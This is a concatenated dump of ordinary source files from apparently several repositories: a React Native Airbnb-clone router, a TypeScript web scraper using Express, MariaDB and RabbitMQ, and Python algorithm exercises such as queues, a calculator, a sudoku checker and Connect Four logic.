justifyContent: 'center',
elevation: (Platform.OS === 'android') ? 50 : 0,
backgroundColor: 'white',
paddingVertical: 15,
borderRadius: 20,
marginHorizontal: 10
},
searchButtonText : {
fontWeight : '700',
paddingStart: 10
}
})
export default styles
<file_sep>import React from 'react'
import {NavigationContainer} from '@react-navigation/native'
import {createStackNavigator} from '@react-navigation/stack'
import DestinationSearchScreen from '../screens/DestinationSearch'
import GuestScreen from '../screens/Guests'
import MainTabNavigator from './MainTabNavigator'
import AccommodationScreen from '../screens/AccommodationScreen'
const Stack = createStackNavigator()
const Router = () => {
return (
<NavigationContainer>
<Stack.Navigator>
<Stack.Screen
name={"Home"}
component={MainTabNavigator}
options={{
headerShown: false
}}
/>
<Stack.Screen
name={"Destination Search"}
component={DestinationSearchScreen}
options={{
title: "Search your Destination"
}}
/>
<Stack.Screen
name={"Guest Search"}
component={GuestScreen}
options={{
title: "How many people?"
}}
/>
<Stack.Screen
name={"Accommodation Details"}
component={AccommodationScreen}
options={{
title: "The place details"
}}
/>
</Stack.Navigator>
</NavigationContainer>
)
}
export default Router;
|
49308fedd1e7649efb6cfb4a508852aff18bc31d
|
[
"JavaScript"
] | 11 |
JavaScript
|
JakeWayne07/Airbnb-React-Native
|
de92334b5480cf6f8bbf41b490cf59a5447391f6
|
b7c619fe9fd0f6fe53e3dc2c6452e91b00d9dad3
|
refs/heads/main
|
<repo_name>gsplash/Lusha<file_sep>/routes/index.ts
import {Router} from "express";
import {parse} from "./parse";
const router = Router()
router.use('/parse', parse);
export { router as routes };<file_sep>/modules/parse/services/parse.service.ts
import {AddWebContent, WebURLExists} from "../../web_content/daos/web_content.dao";
import axios from 'axios';
import {AddWebLinkToQueue} from "../../web_links/daos/web_links.dao";
export async function parseWebURLService(link: string) {
if(await WebURLExists(link)){
//TODO add logger mentions we haven't done anything (?)
return;
}
let parseResponse;
try {
parseResponse = await parse(link);
} catch (err) {
throw new Error(`Failed to parse url '${link}' due to: ${err}`);
}
const webContent: IWebContent = {
url: link,
html: parseResponse.html
}
try {
await AddWebContent(webContent);
} catch (err) {
throw new Error(`Failed to add web content: ${err}`);
}
const promiseList: Promise<void>[] = [];
parseResponse.links.forEach((link: string) => {
promiseList.push(AddWebLinkToQueue(link));
});
// wait for all requests to complete
//TODO: handle promise rejection (delete record from DB?)
await Promise.all(promiseList);
}
async function parse(link: string): Promise<IParseURLResponse> {
//get html content for current link
const html = (await axios.get(link)).data;
//start parse links (mock)
const randomLinks = ["https://google.com", "https://amazon.com", "https://lusha.com", "https://www.autodepot.co.il", "https://apple.com", "https://nasdaq.com","https://ksp.co.il/web/","https://www.ivory.co.il/","https://www.zap.co.il/","https://www.rabbitmq.com//"];
const numberOfLinks = Math.floor(Math.random() * Math.floor(randomLinks.length)) + 1;
const links = [];
// build random list of links
for (let i = 0; i < numberOfLinks; i++) {
const index = Math.floor(Math.random() * Math.floor(randomLinks.length));
links.push(...randomLinks.splice(index, 1));
}
//end parsing
return {
html,
links
}
}<file_sep>/modules/web_content/daos/web_content.dao.ts
import {getConnection} from '../../../data/mariadb'
export async function AddWebContent(content: IWebContent): Promise<void> {
try {
await (await getConnection()).query("INSERT INTO web_links (url,content) VALUES (?,?)",
[content.url, content.html]);
}catch (err){
//throw an error unless its due to duplicate entry
//TODO: add log ?
if(err.code.localeCompare('ER_DUP_ENTRY') !== 0){
throw err;
}
}
}
export async function WebURLExists(url: string): Promise<boolean> {
const res = await (await getConnection()).query("SELECT COUNT(*) as counter FROM web_links WHERE url=?", [url]);
return res?.[0]?.counter != 0;
}<file_sep>/modules/parse/middlewares/parse.middleware.ts
import {Request, Response, NextFunction} from "express";
import {StatusCodes} from 'http-status-codes';
import {parseWebURLService} from "../services/parse.service";
export async function parseWebURL(req: Request, res: Response, next: NextFunction) {
//TODO: check url is valid ?
if (!req.body?.url) {
res.sendStatus(StatusCodes.BAD_REQUEST)
}
try {
await parseWebURLService(req.body.url);
res.json({
status: 'OK'
});
} catch (err) {
//TODO log error message ?
res.sendStatus(StatusCodes.INTERNAL_SERVER_ERROR);
}
}<file_sep>/routes/parse/index.ts
import express from 'express';
import {parseWebURL} from "../../modules/parse/middlewares/parse.middleware";
const router = express.Router()
//TODO: do we need to have permissions for these routes ?
router.use((req, res, next) => {
next();
});
router.post('/', parseWebURL);
export { router as parse };<file_sep>/.env.example
APP_PORT=
DB_HOST=
DB_USER=
DB_PWD=
DB_NAME=
RABBITMQ_CS=
RABBITMQ_LINK_Q_NAME=<file_sep>/modules/parse/models/parse.model.ts
interface IParseURLResponse{
html: string;
links: string[];
}
<file_sep>/data/rabbitmq.ts
import {Channel, ConfirmChannel, Connection} from "amqplib";
const amqp = require('amqplib');
let conn: Connection = null;
export async function getConnection(): Promise<Connection> {
if (conn == null) {
conn = await amqp.connect(process.env.RABBITMQ_CS);
}
return conn;
}
export async function sendMessageToQueue(queue: string, msg: string): Promise<void> {
let ch: ConfirmChannel;
try {
ch = await (await getConnection()).createConfirmChannel();
} catch (err) {
throw new Error(`Failed connect to RabbitMQ: ${err}`);
}
ch.assertQueue(queue).then(async () => {
ch.sendToQueue(queue, Buffer.from(msg), {persistent: true});
await ch.waitForConfirms();
}).catch((err) => {
throw new Error(`Failed to send message to queue (msg: '${msg}'): ${err}`);
}).finally(() => {
ch.close();
});
}<file_sep>/server.ts
require('dotenv').config();
import express from 'express';
import bodyParser from "body-parser";
import {routes} from "./routes";
const port = process.env.PORT || 3000;
const app = express();
app.use(bodyParser.json());
app.use(routes);
app.listen(port);
<file_sep>/modules/web_links/daos/web_links.dao.ts
import {sendMessageToQueue} from '../../../data/rabbitmq'
const WEB_LINK_QUEUE = process.env.RABBITMQ_LINK_Q_NAME;
export async function AddWebLinkToQueue(link: string): Promise<void> {
await sendMessageToQueue(WEB_LINK_QUEUE, link);
}<file_sep>/worker.ts
import {Connection, ConsumeMessage} from "amqplib";
import {parseWebURLService} from "./modules/parse/services/parse.service";
import {getConnection} from "./data/rabbitmq";
require('dotenv').config();
getConnection().then(async (conn: Connection) => {
const ch = await conn.createChannel();
const onMessage = (msg: ConsumeMessage) => {
const body = msg.content.toString();
parseWebURLService(body).then(() => {
ch.ack(msg);
})
};
ch.consume(process.env.RABBITMQ_LINK_Q_NAME, onMessage, {noAck: false}).catch(console.warn);
})<file_sep>/README.md
# WebScrapper
Simple web scrapper
# What has been done
1. Created `/parse` end points that receives a link and adds it to the DB.
Afterwards it builds a random array of URL's that were preset, adds each URL synchronously and at the end verifies that all the URL's were sent properly before sending a response to the client.
2. Created RabbitMQ consumer (`worker.ts`) that reads the messages from RabbitMQ(URL's that were sent in the `/parse` endpoint) and then uses the same functionality that the `/parse` endpoint used.
## How to run
1. Make sure MariaDB installed (can be downloaded from [here](https://mariadb.com/downloads/))
2. Make sure RabbitMQ is installed (can be downloaded from [here](https://www.rabbitmq.com/download.html))
3. Clone the repository from Github
4. Create a new DB in MariaDB and then create a table called `web_links` using
>CREATE TABLE `web_links` ( `url` VARCHAR(255) NOT NULL, `content` LONGTEXT, PRIMARY KEY (`url`) );
5. Install all package dependencies using
>npm i
6. create `.env` file in project root according to `.env.example`
7. Run the service using
> npm start
## Assumptions
1. We would like to store both http & https version of the same link (not considered as 'duplicate')
2. All messages being sent to queue are received (no failures in the connection / queue is never full)
3. We want to parse URL's only one time so even if the content was changed the content would not be parsed nor updated in our DB
4. URL content is not larger than 'LONGTEXT'
## What can be improved
1. Add logs in certain parts to be able to debug & detect issues with the service
2. Use `flywaydb` to build MariaDB schema
3. Use ORM to connect & query MariaDB for better agility (let us switch vendors easily)
4. Add protection for `/parse` endpoint, currently anyone can send URL's to parse
5. Add `insert_time` and `updated_time` in `web_links` schema to be able to have better understanding of our data and being able to parse again when a certain time has passed
6. Split `server.ts` and `worker.ts` to 2 different services
7. OOP (?)
8. Add tests
9. Minify HTML content (?)
<file_sep>/data/mariadb.ts
import mariadb, {Pool} from 'mariadb';
let pool: Pool = null;
export async function getConnection(): Promise<Pool> {
if (pool == null) {
pool = await mariadb.createPool({
host: process.env.DB_HOST,
user: process.env.DB_USER,
password: <PASSWORD>,
database: process.env.DB_NAME
});
}
return pool;
}<file_sep>/modules/web_content/models/web_content.model.ts
interface IWebContent{
url: string;
html: string;
}
|
a9660c00aac672c7483cafcfb7c96d8fbdd4abf1
|
[
"Markdown",
"TypeScript",
"Shell"
] | 14 |
TypeScript
|
gsplash/Lusha
|
290e8582a363879952265c8bcf11fa78b80494e0
|
6de05a78644d6a322751fb44cab668aceee0a7d1
|
refs/heads/master
|
<repo_name>mgershovitz/maya_solves<file_sep>/seven-boom/seven_boom_alt.py
def divisible_by_seven(num):
divisible = num % 7 == 0
return divisible
def contains_seven(num):
contains = '7' in str(num)
return contains
def seven_boom():
num = 1
counter = 1
while True:
if counter == 7:
print("BOOM")
counter = 0
elif contains_seven(num):
print("BOOM")
else:
print(num)
num += 1
counter += 1
if __name__ == "__main__":
seven_boom()
<file_sep>/sudoku_checker_better.py
# Related blog post - https://algoritmim.co.il/2019/07/22/check-sudoku-better/
from math import sqrt
def check_valid_vector(vector):
num_set = set(vector)
return len(num_set) == 9
def check_row_and_columns_are_valid(sudoku):
for i in range(0, 9):
row = sudoku[i]
if not check_valid_vector(row):
return False
column = [sudoku[j][i] for j in range(0, 9)]
if not check_valid_vector(column):
return False
return True
def check_cubes_are_valid(sudoku, board_size):
cube_size = int(sqrt(board_size))
for cube_row in range(0, cube_size):
for cube_column in range(0, cube_size):
cube = []
for i in range(0, cube_size):
for j in range(0, cube_size):
row = cube_row * cube_size + i
column = cube_column * cube_size + j
cube.append(sudoku[row][column])
if not check_valid_vector(cube):
return False
return True
def check_sudoku_is_valid(sudoku):
board_size = len(sudoku)
return check_row_and_columns_are_valid(sudoku) and check_cubes_are_valid(sudoku, board_size)
def run_tests():
valid_sudoku = [[5, 3, 4, 6, 7, 8, 9, 1, 2],
[6, 7, 2, 1, 9, 5, 3, 4, 8],
[1, 9, 8, 3, 4, 2, 5, 6, 7],
[8, 5, 9, 7, 6, 1, 4, 2, 3],
[4, 2, 6, 8, 5, 3, 7, 9, 1],
[7, 1, 3, 9, 2, 4, 8, 5, 6],
[9, 6, 1, 5, 3, 7, 2, 8, 4],
[2, 8, 7, 4, 1, 9, 6, 3, 5],
[3, 4, 5, 2, 8, 6, 1, 7, 9]]
assert check_sudoku_is_valid(valid_sudoku)
not_valid_sudoku = [[5, 3, 4, 6, 7, 8, 9, 1, 2],
[6, 7, 2, 1, 9, 5, 3, 4, 8],
[1, 9, 8, 3, 4, 2, 5, 6, 7],
[8, 5, 9, 7, 6, 1, 4, 2, 3],
[4, 2, 6, 8, 5, 3, 7, 9, 1],
[7, 1, 3, 9, 2, 4, 8, 5, 6],
[9, 6, 1, 5, 3, 7, 2, 8, 4],
[2, 8, 7, 4, 1, 9, 6, 3, 5],
[3, 4, 7, 2, 8, 6, 1, 5, 9]]
assert not check_sudoku_is_valid(not_valid_sudoku)
if __name__ == '__main__':
run_tests()
<file_sep>/longest_sub_sequence_length.py
# Related blog post - https://algoritmim.co.il/2019/08/04/longest-subsequence-length/
def longest_subsequence_length(arr):
longest_length = 0
seq = dict()
for n in arr:
if n - 1 in seq:
seq_min = seq.pop(n - 1)[0]
else:
seq_min = n
if n + 1 in seq:
seq_max = seq.pop(n + 1)[1]
else:
seq_max = n
current_seq = (seq_min, seq_max)
seq[seq_min] = seq[seq_max] = current_seq
longest_length = max(longest_length, current_seq[1]-current_seq[0] + 1)
return longest_length
def run_tests():
assert longest_subsequence_length([2, 5, 3, 10, 9, 4]) == 4
assert longest_subsequence_length([2]) == 1
assert longest_subsequence_length([2, 4, 7, 20, 0]) == 1
assert longest_subsequence_length([101, 2, 3, 4, 5, 6, 100, 1]) == 6
assert longest_subsequence_length([]) == 0
if __name__ == '__main__':
run_tests()<file_sep>/bit_manipulation/README.md
A collection of simple bit manipulation exercises in Python.
Related blog post - https://algoritmim.co.il/2019/07/25/or-xor-and-shift/<file_sep>/copy_bits.py
# Related blog post - https://algoritmim.co.il/2019/06/25/copy-bits/
def copy_bits(N, M, i, j):
x = -1 << i
y = (1 << j+1) - 1
mask = ~(x & y)
N = N & mask
M = M << i
return N | M
def run_tests():
assert copy_bits(0, 0, 2, 6) == 0
assert copy_bits(1, 0, 2, 6) == 1
assert copy_bits(1, 0, 0, 1) == 0
assert copy_bits(int('10001111100', 2), int('10011', 2), 2, 6) == int('10001001100', 2)
assert copy_bits(int('11111111111', 2), int('0000', 2), 5, 8) == int('11000011111', 2)
if __name__ == '__main__':
run_tests()<file_sep>/seven-boom/seven_boom_original.py
def divisible_by_seven(num):
divisible = num % 7 == 0
return divisible
def contains_seven(num):
contains = '7' in str(num)
return contains
def seven_boom():
num = 1
while True:
if divisible_by_seven(num) | contains_seven(num):
print("BOOM")
else:
print(num)
num += 1
if __name__ == "__main__":
seven_boom()
<file_sep>/queues/linked_list_queue.py
class LinkedListNode:
def __init__(self, value):
self.__value = value
self.next_node = None
def value(self):
return self.__value
def set_next(self, node):
self.next_node = node
def get_next(self):
return self.next_node
class NullNode(LinkedListNode):
def __init__(self):
super().__init__(None)
class LinkedListQueue:
def __init__(self):
self.__queue_size = 0
self.first_node = NullNode()
self.last_node = NullNode()
def size(self):
return self.__queue_size
def add(self, value):
if self.__queue_size == 0:
self.first_node = LinkedListNode(value)
self.first_node.set_next(NullNode())
self.last_node = self.first_node
else:
new_last_node = LinkedListNode(value)
self.last_node.set_next(new_last_node)
self.last_node = new_last_node
self.__queue_size += 1
def pop_first(self):
if self.__queue_size == 0:
return None
else:
first_value = self.first_node.value()
self.first_node = self.first_node.get_next()
self.__queue_size -= 1
return first_value
def test():
q = LinkedListQueue()
assert (q.pop_first() is None)
q.add(1)
q.add(2)
assert (q.pop_first() == 1)
assert (q.pop_first() == 2)
assert (q.pop_first() is None)
assert (q.size() == 0)
<file_sep>/coins_and_weights.py
# Related blog post - https://algoritmim.co.il/2019/07/09/coins-and-weights/
class Scale(object):
def __init__(self):
self.weigh_count = 0
def weigh(self, coins_x, coins_y):
self.weigh_count += 1
if sum(coins_x) > sum(coins_y):
return 1
elif sum(coins_y) > sum(coins_x):
return -1
else:
return 0
class CoinsAndWeights(object):
def __init__(self):
self.scale = Scale()
@staticmethod
def divide_group_to_three(group):
groups_size = int(len(group)/3)
groups = []
for i in range(0, 3):
groups.append(group[groups_size * i: groups_size * (i + 1)])
return groups
@staticmethod
def add_regular_coins_to_odd_group(odd_group, control_group):
if len(odd_group) % 3 == 1:
odd_group.extend(control_group[0:2])
elif len(odd_group) % 3 == 2:
odd_group.extend(control_group[0:1])
def find_odd_group(self, coins, odd_coin_weight):
x, y, z = self.divide_group_to_three(coins)
first_weigh = self.scale.weigh(x, y)
if first_weigh == 0:
return z
else:
if first_weigh == odd_coin_weight:
return x
else:
return y
def find_odd_group_and_odd_weight(self, coins):
x, y, z = self.divide_group_to_three(coins)
first_weigh = self.scale.weigh(x, y)
second_weigh = self.scale.weigh(x, z)
if first_weigh == 0 and second_weigh == 0:
return None, None, None
if first_weigh == 0:
odd_group = z
control_group = x
odd_coin_weight = -1 * second_weigh
elif second_weigh == 0:
odd_group = y
control_group = x
odd_coin_weight = -1 * first_weigh
else:
odd_group = x
control_group = y
odd_coin_weight = first_weigh
return odd_group, control_group, odd_coin_weight
def find_odd_coin(self, coins):
coins_remainder_group_size = len(coins) % 3
main_groups_size = len(coins) - coins_remainder_group_size
coins_remainder_group = coins[main_groups_size:]
coins = coins[:main_groups_size]
odd_group, control_group, odd_coin_weight = \
self.find_odd_group_and_odd_weight(coins)
if odd_group is None:
# odd coin is in the remainder group
self.add_regular_coins_to_odd_group(coins_remainder_group, coins)
odd_group, _, _ = self.find_odd_group_and_odd_weight(coins_remainder_group)
return odd_group[0]
while len(odd_group) > 1:
self.add_regular_coins_to_odd_group(odd_group, control_group)
odd_group = self.find_odd_group(odd_group, odd_coin_weight)
return odd_group[0]
def run_tests():
caw = CoinsAndWeights()
coins = [0, 0, 1]
assert caw.find_odd_coin(coins) == 1
assert caw.scale.weigh_count == 2
caw = CoinsAndWeights()
coins = [0, 1, 1]
assert caw.find_odd_coin(coins) == 0
assert caw.scale.weigh_count == 2
caw = CoinsAndWeights()
coins = [1] * 27
coins[10] = 3
assert caw.find_odd_coin(coins) == 3
assert caw.scale.weigh_count == 4
caw = CoinsAndWeights()
coins = [1] * 28
coins[27] = -1
assert caw.find_odd_coin(coins) == -1
assert caw.scale.weigh_count == 4
caw = CoinsAndWeights()
coins = [1] * 100000
coins[9007] = 3
assert caw.find_odd_coin(coins) == 3
assert caw.scale.weigh_count == 12
if __name__ == '__main__':
run_tests()<file_sep>/calculator/README.md
An implementation of a "flexible" calculator that receives
a mathematical expression in a form of a list of chars,
and recursively calculates the results.
The calculator allows the user to choose one of two possible
mathematical writing notation for interpreting the given expression.
The two possible notation relate specifically to the interpretation
of implied multiplication -
1. 8÷2(2+2) = 8÷2*(2+2) = 8÷2*4 = 4*4 = 16
2. 8÷2(2+2) = 8/(2*(2+2)) = 8/(2*4) = 8/8 = 1
Related blog posts -
Calculator part A - https://algoritmim.co.il/2019/08/24/cala-part-a/
Calculator part B - https://algoritmim.co.il/2019/08/24/cala-part-b/<file_sep>/first_ancestor.py
# Related blog post - https://algoritmim.co.il/2019/06/24/first-ancestor/
class Node(object):
def __init__(self, val, parent):
self.val = val
self.parent = parent
self.visited = False
def __repr__(self):
return self.val
def find_first_ancestor_recur(x, y):
if x is not None and y is not None and x == y:
return x
next_nodes = []
for node in [x, y]:
if node is not None:
if node.visited:
return node
else:
node.visited = True
next_nodes.append(node.parent)
return find_first_ancestor_recur(next_nodes[0], next_nodes[1])
def find_first_ancestor(x, y):
if x.parent is None or y.parent is None:
return
return find_first_ancestor_recur(x.parent, y.parent)
def run_tests():
a = Node("A", None)
assert find_first_ancestor(a, a) is None
b = Node("B", a)
c = Node("C", a)
assert find_first_ancestor(b, c) == a
d = Node("D", b)
e = Node("E", d)
f = Node("F", d)
assert find_first_ancestor(b, c) == a
assert find_first_ancestor(d, e) == b
assert find_first_ancestor(f, e) == d
assert find_first_ancestor(e, c) == a
if __name__ == '__main__':
run_tests()<file_sep>/approximate_sort.py
# Related blog post - https://algoritmim.co.il/2019/06/19/approximate-sort/
from heapq import heappop, heappush
def sort_approximate(arr, k):
if k == 0:
return arr
sorted_arr = list()
heap = []
for i in range(0, k):
heappush(heap, arr[i])
for i in range(k, len(arr)):
sorted_arr.append(heappop(heap))
heappush(heap,arr[i])
for i in range(0, k):
sorted_arr.append(heappop(heap))
return sorted_arr
def run_tests():
examples = [
(3,[3, 1, 4, 2, 7, 6, 5]),
(0,[1,2]),
(7, [3, 1, 4, 2, 7, 6, 5]),
(7, [35, 70, 61, 24, 53, 40, 1, 14, 30, 29, 100, 99, 36]),
]
for (k,arr) in examples:
print("Original array - ")
print(arr)
sorted_array = sort_approximate(arr, k)
print("Array after sorting - ")
print(sorted_array)
if __name__ == '__main__':
run_tests()
<file_sep>/Mastermind/app/main.py
import random
from consts import *
from app.game_logic.player import get_player_guess
from app.game_logic.checkers import check_player_guess_with_duplicates
def generate_code():
code = []
for i in range(0, CODE_LENGTH):
code.append(random.choice(COLORS))
return code
def play():
computer_code = generate_code()
game_won = False
rounds = 0
while not game_won and rounds < TOTAL_ROUNDS:
player_guess = get_player_guess()
bul, pgia = check_player_guess_with_duplicates(computer_code, player_guess)
if bul == CODE_LENGTH:
game_won = True
break
else:
print(USER_SCORE.format(bul, pgia))
rounds += 1
if game_won:
print(USER_WON)
else:
print(USER_LOST)
if __name__ == '__main__':
play()
<file_sep>/queues/indexed_queue.py
class IndexedQueue:
def __init__(self):
self.queue = list()
self.__queue_size = 0
self.start_index = 0
def size(self):
return self.__queue_size
def add(self, item):
self.queue.append(item)
self.__queue_size += 1
def pop_first(self):
if self.__queue_size == 0:
return None
if self.start_index == self.__queue_size - 1:
return None
else:
first_item = self.queue[self.start_index]
self.__queue_size -= 1
self.start_index += 1
return first_item
def test():
q = IndexedQueue()
assert (q.pop_first() is None)
q.add(1)
q.add(2)
assert (q.pop_first() == 1)
assert (q.pop_first() == 2)
assert (q.pop_first() is None)
assert (q.size() == 0)
<file_sep>/hello_world/hello_world_go.go
package main
import "fmt"
func main() {
space := ""
for _, c := range "Hello World" {
fmt.Println(space + string(c))
space += " "
}
}
<file_sep>/four_in_a_row/logic.py
# Related blog post - https://algoritmim.co.il/just-code/connect-four-game-in-python/
from four_in_a_row.board import Color
from four_in_a_row.board import BoardUtils
def four_sequence_exists(discs_vector):
longest_seq = 1
current_seq = 1
for i in range(1, len(discs_vector)):
if discs_vector[i] == discs_vector[i - 1] and not (discs_vector[i] is Color.EMPTY.value):
current_seq += 1
if current_seq > longest_seq:
longest_seq = current_seq
else:
current_seq = 1
return longest_seq == 4
def add_disc(current_color, board, column):
row = 0
success = False
while row < board.rows and not success:
if board.get(row, column) is Color.EMPTY:
board.set(row, column, current_color)
success = True
else:
row += 1
return success
def is_win(board, row, column):
vector_getters = [BoardUtils.get_row_vector, BoardUtils.get_column_vector, BoardUtils.get_positive_diagonal_vector,
BoardUtils.get_negative_diagonal_vector
]
for getter in vector_getters:
discs_vector = getter(board, row, column)
if four_sequence_exists(discs_vector):
return True
return False
<file_sep>/recursion/bad_fib.py
from datetime import datetime
def fib(n):
if (n <= 2):
return 1
else:
return fib(n - 1) + fib(n - 2)
def run(n):
start_time = datetime.now()
res = fib(n)
print("Calculating fib(%d) = %d took %s seconds" % (n, res, datetime.now() - start_time))
if __name__ == '__main__':
run(2)
run(5)
run(10)
run(20)
run(30)
run(40)
run(60)
<file_sep>/recur_multiply.py
# Related blog post - https://algoritmim.co.il/2019/06/20/recur-multiply/
class Multiplier(object):
def __init__(self):
self.results_cache = {}
def recur_multiply(self, a, b):
if a == 0:
return 0
if b not in self.results_cache:
if b == 0:
self.results_cache[0] = 0
elif b == 1:
self.results_cache[1] = a
elif b % 2 == 0:
if b / 2 not in self.results_cache:
self.results_cache[b / 2] = self.recur_multiply(a, b / 2)
self.results_cache[b] = self.results_cache[b / 2] + self.results_cache[b / 2]
else:
self.results_cache[(b - 1) / 2] = self.recur_multiply(a, (b - 1) / 2)
self.results_cache[b] = self.results_cache[(b - 1) / 2] + \
self.results_cache[(b - 1) / 2] + \
self.recur_multiply(a, 1)
return self.results_cache[b]
def multiply(self, a, b):
if a > b:
return self.recur_multiply(a, b)
else:
return self.recur_multiply(b, a)
def run_tests():
assert Multiplier().multiply(3, 10) == 30
assert Multiplier().multiply(10, 3) == 30
assert Multiplier().multiply(3, 0) == 0
assert Multiplier().multiply(0, 10) == 0
assert Multiplier().multiply(pow(2, 3), pow(2, 10)) == 8192
if __name__ == '__main__':
run_tests()<file_sep>/find_median_of_three.py
# Related blog post - https://algoritmim.co.il/2019/06/17/find-median-of-three/
def is_median(x,y,z):
# Returns True if x is the median of the group x,y,z
if x <= y and x >= z or x>=y and x<=z:
return True
else:
return False
def get_median_of_three(a,b,c):
if is_median(a,b,c):
return a
if is_median(b,c,a):
return b
else:
return c
def run_test():
print("The median of [0,0,0] is %d" % get_median_of_three(0,0,0))
print("The median of [10,2,6] is %d" % get_median_of_three(10,2,6))
print("The median of [100,-100,-100] is %d" % get_median_of_three(100,-100,-100))
print("The median of [1,1,9] is %d" % get_median_of_three(1,1,9))
if __name__ == "__main__":
run_test()
<file_sep>/paint_and_fill.py
# Related blog post - https://algoritmim.co.il/2019/06/24/paint-and-fill/
from termcolor import colored
class Position(object):
def __init__(self, x, y):
self.x = x
self.y = y
def get_neighbours(self):
return [
Position(self.x - 1, self.y),
Position(self.x + 1, self.y),
Position(self.x, self.y - 1),
Position(self.x, self.y + 1)
]
class Screen(object):
def __init__(self, base_mat):
self.mat = base_mat
def get_color(self, pos):
return self.mat[pos.x][pos.y]
def set_color(self, pos, new_color):
self.mat[pos.x][pos.y] = new_color
def pos_in_bounds(self, pos):
return 0 <= pos.x < len(self.mat) and 0 <= pos.y < len(self.mat[0])
def get_neighbour(self, pos, old_color):
possible_neighbours = pos.get_neighbours()
for neighbour in possible_neighbours:
if self.pos_in_bounds(neighbour) and self.get_color(neighbour) == old_color:
return neighbour
def print(self):
for i in range(0, len(self.mat)):
row = ""
for j in range(0, len(self.mat[0])):
row += colored("\u2588", self.get_color(Position(i, j)))
print(row)
def paint_and_fill_recur(self, pos, new_color, old_color):
self.set_color(pos, new_color)
next_neighbour = self.get_neighbour(pos, old_color)
while next_neighbour:
self.paint_and_fill_recur(next_neighbour, new_color, old_color)
next_neighbour = self.get_neighbour(pos, old_color)
def paint_and_fill(self, pos, new_color):
if self.get_color(pos) != new_color:
self.paint_and_fill_recur(pos, new_color, self.get_color(pos))
class Colors(object):
W = 'white'
B = 'blue'
G = 'green'
M = 'magenta'
R = 'red'
def run_tests():
A = Screen([[Colors.W, Colors.W, Colors.R]])
print("Before:")
A.print()
A.paint_and_fill(Position(0,0), Colors.B)
print("Paint and fill from (0,0) in blue:")
A.print()
A = Screen([[Colors.R]])
print("Before:")
A.print()
A.paint_and_fill(Position(0,0), Colors.B)
print("Paint and fill from (0,0) in blue:")
A.print()
A = Screen([[Colors.W, Colors.W, Colors.W], [Colors.W, Colors.B, Colors.W], [Colors.W, Colors.W, Colors.W]])
print("Before:")
A.print()
A.paint_and_fill(Position(0,0), Colors.B)
print("Paint and fill from (0,0) in blue:")
A.print()
A.paint_and_fill(Position(1,1), Colors.M)
print("Paint and fill from (1,1) in pink:")
A.print()
A = Screen([[Colors.W, Colors.W, Colors.W], [Colors.W, Colors.B, Colors.W], [Colors.W, Colors.W, Colors.W]])
print("Before:")
A.print()
A.paint_and_fill(Position(2,2), Colors.M)
print("Paint and fill from (2,2) in pink:")
A.print()
A.paint_and_fill(Position(1,1), Colors.W)
print("Paint and fill from (1,1) in white:")
A.print()
A = Screen([[Colors.W, Colors.W, Colors.W], [Colors.W, Colors.W, Colors.W], [Colors.B, Colors.W, Colors.B]])
print("Before:")
A.print()
A.paint_and_fill(Position(0, 0), Colors.G)
print("Paint and fill from (0,0) in Green:")
A.print()
if __name__ == '__main__':
run_tests()<file_sep>/calculator/basic_calc.py
from operator import add, truediv, imul, isub
class OpStr(object):
ADD = "+"
SUB = "-"
MUL = "*"
DIV = "/"
PAR_L = "("
PAR_R = ")"
class BasicCalculator(object):
def __init__(self):
self.operator_to_action = {
OpStr.ADD: add,
OpStr.SUB: isub,
OpStr.MUL: imul,
OpStr.DIV: truediv
}
def __eval_expression(self, arg_1, operator, arg_2):
action = self.operator_to_action[operator]
return action(arg_1, arg_2)
def __evaluate_next_val_and_get_length(self, exp_arr, index):
sub_exp_length = 2
val = exp_arr[index + 1]
if val == OpStr.PAR_L:
sub_exp_length, val = self.__solve_expression_wrap(exp_arr[index + 2:])
return sub_exp_length, val
def __solve_expression(self, exp_arr, current_operators):
new_exp = [exp_arr[0]]
i = 1
while i < len(exp_arr):
operator = exp_arr[i]
if operator == OpStr.PAR_R:
current_exp_length = i + 2
return current_exp_length, new_exp
sub_exp_length, val = self.__evaluate_next_val_and_get_length(exp_arr, i)
if operator in current_operators:
res = self.__eval_expression(new_exp.pop(), operator, val)
new_exp.append(res)
else:
new_exp.append(operator)
new_exp.append(val)
i += sub_exp_length
return len(exp_arr), new_exp
def __solve_expression_wrap(self, exp_arr):
sub_exp_length, exp_arr = self.__solve_expression(exp_arr, [OpStr.MUL, OpStr.DIV])
_, exp_arr = self.__solve_expression(exp_arr, [OpStr.ADD, OpStr.SUB])
return sub_exp_length + 1, exp_arr[0]
def solve(self, exp_arr):
sub_exp_length, res = self.__solve_expression_wrap(exp_arr)
return res
def run_tests():
calc = BasicCalculator()
assert calc.solve([1, "+", 2]) == 3
assert calc.solve([1, "-", 2]) == -1
assert calc.solve([2, "*", "(", 1, "+", 3, ")"]) == 8
assert calc.solve([2, "*", "(", 1, "+", 6, "/", 3, ")"]) == 6
assert calc.solve([2, "*", "(", 1, "+", 6, "/", 3, ")", "-", "(", 5, "*", 2, ")"]) == -4
assert calc.solve([2, "+", "(", 3, "*", "(", 8, "/", 2, ")", "-", 10, ")"]) == 4
if __name__ == '__main__':
run_tests()
<file_sep>/matrix_sums.py
class MatrixPosistion(object):
def __init__(self,i,j):
self.i = i
self.j = j
class MatrixSums(object):
def __init__(self):
self.sums_matrix = None
self.rows = 0
self.columns = 0
def sum(self, pos_a,pos_b):
pos_b_sum = self.get_cell_value(pos_b)
left_mat_sum = self.get_cell_value(MatrixPosistion(pos_b.i, pos_a.j-1))
top_mat_sum = self.get_cell_value(MatrixPosistion(pos_a.i-1,pos_b.j))
corner_mat_sum = self.get_cell_value(MatrixPosistion(pos_a.i-1, pos_a.j-1))
return pos_b_sum - left_mat_sum - top_mat_sum + corner_mat_sum
def get(self, pos_a):
return self.sum(pos_a, pos_a)
def set(self,pos,val):
original_set_value = self.get(pos)
diff = val - original_set_value
for i in range(pos.i,self.rows):
for j in range(pos.j,self.columns):
self.sums_matrix[i][j] += diff
def init_sums_matrix(self, base_matrix):
self.rows = len(base_matrix)
self.columns = len(base_matrix[0])
self.sums_matrix = []
for i in range(0,self.rows):
self.sums_matrix.append(list())
for j in range(0,self.columns):
self.sums_matrix[i].append(0)
for i in range(self.rows-1,-1,-1):
for j in range(self.columns-1,-1,-1):
self.set(MatrixPosistion(i,j),base_matrix[i][j])
def get_cell_value(self,pos):
if pos.i < 0:
return 0
if pos.j < 0:
return 0
return self.sums_matrix[pos.i][pos.j]
def run_tests():
t = MatrixSums()
# [1]
t.init_sums_matrix([[1]])
assert t.get(MatrixPosistion(0, 0)) == 1
assert t.sum(MatrixPosistion(0, 0),MatrixPosistion(0, 0)) == 1
t.set(MatrixPosistion(0, 0),5)
